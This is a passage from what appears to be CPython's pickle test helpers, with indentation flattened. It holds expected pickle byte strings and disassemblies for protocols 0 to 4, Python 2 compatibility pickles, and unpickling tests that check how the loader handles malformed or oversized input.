_testbuffer = None
from test import support
from test.support import (
TestFailed, TESTFN, run_with_locale, no_tracing,
_2G, _4G, bigmemtest, reap_threads, forget,
save_restore_warnings_filters
)
from pickle import bytes_types
# bpo-41003: Save/restore warnings filters to leave them unchanged.
# Ignore filters installed by numpy.
try:
with save_restore_warnings_filters():
import numpy as np
except ImportError:
np = None
requires_32b = unittest.skipUnless(sys.maxsize < 2**32,
"test is only meaningful on 32-bit builds")
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
def identity(x):
return x
class UnseekableIO(io.BytesIO):
def peek(self, *args):
raise NotImplementedError
def seekable(self):
return False
def seek(self, *args):
raise io.UnsupportedOperation
def tell(self):
raise io.UnsupportedOperation
class MinimalIO(object):
"""
A file-like object that doesn't support readinto().
"""
def __init__(self, *args):
self._bio = io.BytesIO(*args)
self.getvalue = self._bio.getvalue
self.read = self._bio.read
self.readline = self._bio.readline
self.write = self._bio.write
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
# Simple mutable object.
class Object:
pass
# Hashable immutable key object containing unheshable mutable data.
class K:
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
class ZeroCopyBytes(bytes):
readonly = True
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
class ZeroCopyBytearray(bytearray):
readonly = False
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
if _testbuffer is not None:
class PicklableNDArray:
# A not-really-zero-copy picklable ndarray, as the ndarray()
# constructor doesn't allow for it
zero_copy_reconstruct = False
def __init__(self, *args, **kwargs):
self.array = _testbuffer.ndarray(*args, **kwargs)
def __getitem__(self, idx):
cls = type(self)
new = cls.__new__(cls)
new.array = self.array[idx]
return new
@property
def readonly(self):
return self.array.readonly
@property
def c_contiguous(self):
return self.array.c_contiguous
@property
def f_contiguous(self):
return self.array.f_contiguous
def __eq__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return (other.array.format == self.array.format and
other.array.shape == self.array.shape and
other.array.strides == self.array.strides and
other.array.readonly == self.array.readonly and
other.array.tobytes() == self.array.tobytes())
def __ne__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return not (self == other)
def __repr__(self):
return (f"{type(self)}(shape={self.array.shape},"
f"strides={self.array.strides}, "
f"bytes={self.array.tobytes()})")
def __reduce_ex__(self, protocol):
if not self.array.contiguous:
raise NotImplementedError("Reconstructing a non-contiguous "
"ndarray does not seem possible")
ndarray_kwargs = {"shape": self.array.shape,
"strides": self.array.strides,
"format": self.array.format,
"flags": (0 if self.readonly
else _testbuffer.ND_WRITABLE)}
pb = pickle.PickleBuffer(self.array)
if protocol >= 5:
return (type(self)._reconstruct,
(pb, ndarray_kwargs))
else:
# Need to serialize the bytes in physical order
with pb.raw() as m:
return (type(self)._reconstruct,
(m.tobytes(), ndarray_kwargs))
@classmethod
def _reconstruct(cls, obj, kwargs):
with memoryview(obj) as m:
# For some reason, ndarray() wants a list of integers...
# XXX This only works if format == 'B'
items = list(m.tobytes())
return cls(items, **kwargs)
# DATA0 .. DATA4 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\n'
b'ac__builtin__\ncomple'
b'x\np1\n(F3.0\nF0.0\ntp2\n'
b'Rp3\naL1L\naL-1L\naL255'
b'L\naL-255L\naL-256L\naL'
b'65535L\naL-65535L\naL-'
b'65536L\naL2147483647L'
b'\naL-2147483647L\naL-2'
b'147483648L\na(Vabc\np4'
b'\ng4\nccopy_reg\n_recon'
b'structor\np5\n(c__main'
b'__\nC\np6\nc__builtin__'
b'\nobject\np7\nNtp8\nRp9\n'
b'(dp10\nVfoo\np11\nL1L\ns'
b'Vbar\np12\nL2L\nsbg9\ntp'
b'13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL '__builtin__ complex'
42: p PUT 1
45: ( MARK
46: F FLOAT 3.0
51: F FLOAT 0.0
56: t TUPLE (MARK at 45)
57: p PUT 2
60: R REDUCE
61: p PUT 3
64: a APPEND
65: L LONG 1
69: a APPEND
70: L LONG -1
75: a APPEND
76: L LONG 255
82: a APPEND
83: L LONG -255
90: a APPEND
91: L LONG -256
98: a APPEND
99: L LONG 65535
107: a APPEND
108: L LONG -65535
117: a APPEND
118: L LONG -65536
127: a APPEND
128: L LONG 2147483647
141: a APPEND
142: L LONG -2147483647
156: a APPEND
157: L LONG -2147483648
171: a APPEND
172: ( MARK
173: V UNICODE 'abc'
178: p PUT 4
181: g GET 4
184: c GLOBAL 'copy_reg _reconstructor'
209: p PUT 5
212: ( MARK
213: c GLOBAL '__main__ C'
225: p PUT 6
228: c GLOBAL '__builtin__ object'
248: p PUT 7
251: N NONE
252: t TUPLE (MARK at 212)
253: p PUT 8
256: R REDUCE
257: p PUT 9
260: ( MARK
261: d DICT (MARK at 260)
262: p PUT 10
266: V UNICODE 'foo'
271: p PUT 11
275: L LONG 1
279: s SETITEM
280: V UNICODE 'bar'
285: p PUT 12
289: L LONG 2
293: s SETITEM
294: b BUILD
295: g GET 9
298: t TUPLE (MARK at 172)
299: p PUT 13
303: a APPEND
304: g GET 13
308: a APPEND
309: L LONG 5
313: a APPEND
314: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c__'
b'builtin__\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopy_reg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06c__builtin__\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL '__builtin__ complex'
38: q BINPUT 1
40: ( MARK
41: G BINFLOAT 3.0
50: G BINFLOAT 0.0
59: t TUPLE (MARK at 40)
60: q BINPUT 2
62: R REDUCE
63: q BINPUT 3
65: K BININT1 1
67: J BININT -1
72: K BININT1 255
74: J BININT -255
79: J BININT -256
84: M BININT2 65535
87: J BININT -65535
92: J BININT -65536
97: J BININT 2147483647
102: J BININT -2147483647
107: J BININT -2147483648
112: ( MARK
113: X BINUNICODE 'abc'
121: q BINPUT 4
123: h BINGET 4
125: c GLOBAL 'copy_reg _reconstructor'
150: q BINPUT 5
152: ( MARK
153: c GLOBAL '__main__ C'
165: q BINPUT 6
167: c GLOBAL '__builtin__ object'
187: q BINPUT 7
189: N NONE
190: t TUPLE (MARK at 152)
191: q BINPUT 8
193: R REDUCE
194: q BINPUT 9
196: } EMPTY_DICT
197: q BINPUT 10
199: ( MARK
200: X BINUNICODE 'foo'
208: q BINPUT 11
210: K BININT1 1
212: X BINUNICODE 'bar'
220: q BINPUT 12
222: K BININT1 2
224: u SETITEMS (MARK at 199)
225: b BUILD
226: h BINGET 9
228: t TUPLE (MARK at 112)
229: q BINPUT 13
231: h BINGET 13
233: K BININT1 5
235: e APPENDS (MARK at 3)
236: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'__builtin__\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL '__builtin__ complex'
40: q BINPUT 1
42: G BINFLOAT 3.0
51: G BINFLOAT 0.0
60: \x86 TUPLE2
61: q BINPUT 2
63: R REDUCE
64: q BINPUT 3
66: K BININT1 1
68: J BININT -1
73: K BININT1 255
75: J BININT -255
80: J BININT -256
85: M BININT2 65535
88: J BININT -65535
93: J BININT -65536
98: J BININT 2147483647
103: J BININT -2147483647
108: J BININT -2147483648
113: ( MARK
114: X BINUNICODE 'abc'
122: q BINPUT 4
124: h BINGET 4
126: c GLOBAL '__main__ C'
138: q BINPUT 5
140: ) EMPTY_TUPLE
141: \x81 NEWOBJ
142: q BINPUT 6
144: } EMPTY_DICT
145: q BINPUT 7
147: ( MARK
148: X BINUNICODE 'foo'
156: q BINPUT 8
158: K BININT1 1
160: X BINUNICODE 'bar'
168: q BINPUT 9
170: K BININT1 2
172: u SETITEMS (MARK at 147)
173: b BUILD
174: h BINGET 6
176: t TUPLE (MARK at 113)
177: q BINPUT 10
179: h BINGET 10
181: K BININT1 5
183: e APPENDS (MARK at 5)
184: . STOP
highest protocol among opcodes = 2
"""
DATA3 = (
b'\x80\x03]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01G'
b'@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00\x86q\x02'
b'Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ\x00\xff'
b'\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff\xff\x7f'
b'J\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00abcq'
b'\x04h\x04c__main__\nC\nq\x05)\x81q'
b'\x06}q\x07(X\x03\x00\x00\x00barq\x08K\x02X\x03\x00'
b'\x00\x00fooq\tK\x01ubh\x06tq\nh\nK\x05'
b'e.'
)
# Disassembly of DATA3
DATA3_DIS = """\
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'bar'
153: q BINPUT 8
155: K BININT1 2
157: X BINUNICODE 'foo'
165: q BINPUT 9
167: K BININT1 1
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
DATA4 = (
b'\x80\x04\x95\xa8\x00\x00\x00\x00\x00\x00\x00]\x94(K\x00K\x01G@'
b'\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07'
b'complex\x94\x93\x94G@\x08\x00\x00\x00\x00\x00\x00G'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x86\x94R\x94K\x01J\xff\xff\xff\xffK'
b'\xffJ\x01\xff\xff\xffJ\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ'
b'\x00\x00\xff\xffJ\xff\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80('
b'\x8c\x03abc\x94h\x06\x8c\x08__main__\x94\x8c'
b'\x01C\x94\x93\x94)\x81\x94}\x94(\x8c\x03bar\x94K\x02\x8c'
b'\x03foo\x94K\x01ubh\nt\x94h\x0eK\x05e.'
)
# Disassembly of DATA4
DATA4_DIS = """\
0: \x80 PROTO 4
2: \x95 FRAME 168
11: ] EMPTY_LIST
12: \x94 MEMOIZE
13: ( MARK
14: K BININT1 0
16: K BININT1 1
18: G BINFLOAT 2.0
27: \x8c SHORT_BINUNICODE 'builtins'
37: \x94 MEMOIZE
38: \x8c SHORT_BINUNICODE 'complex'
47: \x94 MEMOIZE
48: \x93 STACK_GLOBAL
49: \x94 MEMOIZE
50: G BINFLOAT 3.0
59: G BINFLOAT 0.0
68: \x86 TUPLE2
69: \x94 MEMOIZE
70: R REDUCE
71: \x94 MEMOIZE
72: K BININT1 1
74: J BININT -1
79: K BININT1 255
81: J BININT -255
86: J BININT -256
91: M BININT2 65535
94: J BININT -65535
99: J BININT -65536
104: J BININT 2147483647
109: J BININT -2147483647
114: J BININT -2147483648
119: ( MARK
120: \x8c SHORT_BINUNICODE 'abc'
125: \x94 MEMOIZE
126: h BINGET 6
128: \x8c SHORT_BINUNICODE '__main__'
138: \x94 MEMOIZE
139: \x8c SHORT_BINUNICODE 'C'
142: \x94 MEMOIZE
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE
145: ) EMPTY_TUPLE
146: \x81 NEWOBJ
147: \x94 MEMOIZE
148: } EMPTY_DICT
149: \x94 MEMOIZE
150: ( MARK
151: \x8c SHORT_BINUNICODE 'bar'
156: \x94 MEMOIZE
157: K BININT1 2
159: \x8c SHORT_BINUNICODE 'foo'
164: \x94 MEMOIZE
165: K BININT1 1
167: u SETITEMS (MARK at 150)
168: b BUILD
169: h BINGET 10
171: t TUPLE (MARK at 119)
172: \x94 MEMOIZE
173: h BINGET 14
175: K BININT1 5
177: e APPENDS (MARK at 13)
178: . STOP
highest protocol among opcodes = 4
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA_SET = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA_XRANGE = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA_COOKIE = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA_SET2 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
python2_exceptions_without_args = (
ArithmeticError,
AssertionError,
AttributeError,
BaseException,
BufferError,
BytesWarning,
DeprecationWarning,
EOFError,
EnvironmentError,
Exception,
FloatingPointError,
FutureWarning,
GeneratorExit,
IOError,
ImportError,
ImportWarning,
IndentationError,
IndexError,
KeyError,
KeyboardInterrupt,
LookupError,
MemoryError,
NameError,
NotImplementedError,
OSError,
OverflowError,
PendingDeprecationWarning,
ReferenceError,
RuntimeError,
RuntimeWarning,
# StandardError is gone in Python 3, we map it to Exception
StopIteration,
SyntaxError,
SyntaxWarning,
SystemError,
SystemExit,
TabError,
TypeError,
UnboundLocalError,
UnicodeError,
UnicodeWarning,
UserWarning,
ValueError,
Warning,
ZeroDivisionError,
)
exception_pickle = b'\x80\x02cexceptions\n?\nq\x00)Rq\x01.'
# UnicodeEncodeError object pickled from 2.x with protocol 2
DATA_UEERR = (b'\x80\x02cexceptions\nUnicodeEncodeError\n'
b'q\x00(U\x05asciiq\x01X\x03\x00\x00\x00fooq\x02K\x00K\x01'
b'U\x03badq\x03tq\x04Rq\x05.')
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractUnpickleTests(unittest.TestCase):
# Subclass must define self.loads.
_testdata = create_data()
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_unpickling_error(self, errors, data):
with self.subTest(data=data), \
self.assertRaises(errors):
try:
self.loads(data)
except BaseException as exc:
if support.verbose > 1:
print('%-32r - %s: %s' %
(data, exc.__class__.__name__, exc))
raise
def test_load_from_data0(self):
self.assert_is_copy(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assert_is_copy(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assert_is_copy(self._testdata, self.loads(DATA2))
def test_load_from_data3(self):
self.assert_is_copy(self._testdata, self.loads(DATA3))
def test_load_from_data4(self):
self.assert_is_copy(self._testdata, self.loads(DATA4))
def test_load_classic_instance(self):
# See issue5180. Test loading 2.x pickles that
# contain an instance of old style class.
for X, args in [(C, ()), (D, ('x',)), (E, ())]:
xname = X.__name__.encode('ascii')
# Protocol 0 (text mode pickle):
"""
0: ( MARK
1: i INST '__main__ X' (MARK at 0)
13: p PUT 0
16: ( MARK
17: d DICT (MARK at 16)
18: p PUT 1
21: b BUILD
22: . STOP
"""
pickle0 = (b"(i__main__\n"
b"X\n"
b"p0\n"
b"(dp1\nb.").replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle0))
# Protocol 1 (binary mode pickle)
"""
0: ( MARK
1: c GLOBAL '__main__ X'
13: q BINPUT 0
15: o OBJ (MARK at 0)
16: q BINPUT 1
18: } EMPTY_DICT
19: q BINPUT 2
21: b BUILD
22: . STOP
"""
pickle1 = (b'(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle1))
# Protocol 2 (pickle2 = b'\x80\x02' + pickle1)
"""
0: \x80 PROTO 2
2: ( MARK
3: c GLOBAL '__main__ X'
15: q BINPUT 0
17: o OBJ (MARK at 2)
18: q BINPUT 1
20: } EMPTY_DICT
21: q BINPUT 2
23: b BUILD
24: . STOP
"""
pickle2 = (b'\x80\x02(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle2))
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assert_is_copy(maxint64, got)
# Try too with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.check_unpickling_error(ValueError, data)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA_SET)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA_XRANGE)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA_COOKIE)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "value")
# Exception objects without arguments pickled from 2.x with protocol 2
for exc in python2_exceptions_without_args:
data = exception_pickle.replace(b'?', exc.__name__.encode("ascii"))
loaded = self.loads(data)
self.assertIs(type(loaded), exc)
# StandardError is mapped to Exception, test that separately
loaded = self.loads(exception_pickle.replace(b'?', b'StandardError'))
self.assertIs(type(loaded), Exception)
loaded = self.loads(DATA_UEERR)
self.assertIs(type(loaded), UnicodeEncodeError)
self.assertEqual(loaded.object, "foo")
self.assertEqual(loaded.encoding, "ascii")
self.assertEqual(loaded.start, 0)
self.assertEqual(loaded.end, 1)
self.assertEqual(loaded.reason, "bad")
def test_load_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('a\x00\xa0', protocol=0)
self.assertEqual(self.loads(b"S'a\\x00\\xa0'\n.",
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=1)
self.assertEqual(self.loads(b'U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=2)
self.assertEqual(self.loads(b'\x80\x02U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
def test_load_python2_unicode_as_str(self):
# From Python 2: pickle.dumps(u'π', protocol=0)
self.assertEqual(self.loads(b'V\\u03c0\n.',
encoding='bytes'), 'π')
# From Python 2: pickle.dumps(u'π', protocol=1)
self.assertEqual(self.loads(b'X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
# From Python 2: pickle.dumps(u'π', protocol=2)
self.assertEqual(self.loads(b'\x80\x02X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
def test_load_long_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('x' * 300, protocol=1)
self.assertEqual(self.loads(pickle.BINSTRING +
struct.pack("<I", 300) +
b'x' * 300 + pickle.STOP,
encoding='bytes'), b'x' * 300)
def test_constants(self):
self.assertIsNone(self.loads(b'N.'))
self.assertIs(self.loads(b'\x88.'), True)
self.assertIs(self.loads(b'\x89.'), False)
self.assertIs(self.loads(b'I01\n.'), True)
self.assertIs(self.loads(b'I00\n.'), False)
def test_empty_bytestring(self):
# issue 11286
empty = self.loads(b'\x80\x03U\x00q\x00.', encoding='koi8-r')
self.assertEqual(empty, '')
def test_short_binbytes(self):
dumped = b'\x80\x03C\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binbytes(self):
dumped = b'\x80\x03B\x04\x00\x00\x00\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
@requires_32b
def test_negative_32b_binbytes(self):
# On 32-bit builds, a BINBYTES of 2**31 or more is refused
dumped = b'\x80\x03B\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_negative_32b_binunicode(self):
# On 32-bit builds, a BINUNICODE of 2**31 or more is refused
dumped = b'\x80\x03X\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_short_binunicode(self):
dumped = b'\x80\x04\x8c\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_misc_get(self):
self.check_unpickling_error(KeyError, b'g0\np0')
self.assert_is_copy([(100,), (100,)],
self.loads(b'((Kdtp0\nh\x00l.))'))
def test_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_bytearray8(self):
dumped = b'\x80\x05\x96\x03\x00\x00\x00\x00\x00\x00\x00xxx.'
self.assertEqual(self.loads(dumped), bytearray(b'xxx'))
@requires_32b
def test_large_32b_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_bytearray8(self):
dumped = b'\x80\x05\x96\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_get(self):
pickled = b'((lp100000\ng100000\nt.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_binget(self):
pickled = b'(]q\xffh\xfft.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_long_binget(self):
pickled = b'(]r\x00\x00\x01\x00j\x00\x00\x01\x00t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_dup(self):
pickled = b'((l2t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_negative_put(self):
# Issue #12847
dumped = b'Va\np-1\n.'
self.check_unpickling_error(ValueError, dumped)
@requires_32b
def test_negative_32b_binput(self):
# Issue #12847
dumped = b'\x80\x03X\x01\x00\x00\x00ar\xff\xff\xff\xff.'
self.check_unpickling_error(ValueError, dumped)
def test_badly_escaped_string(self):
self.check_unpickling_error(ValueError, b"S'\\'\n.")
def test_badly_quoted_string(self):
# Issue #17710
badpickles = [b"S'\n.",
b'S"\n.',
b'S\' \n.',
b'S" \n.',
b'S\'"\n.',
b'S"\'\n.',
b"S' ' \n.",
b'S" " \n.',
b"S ''\n.",
b'S ""\n.',
b'S \n.',
b'S\n.',
b'S.']
for p in badpickles:
self.check_unpickling_error(pickle.UnpicklingError, p)
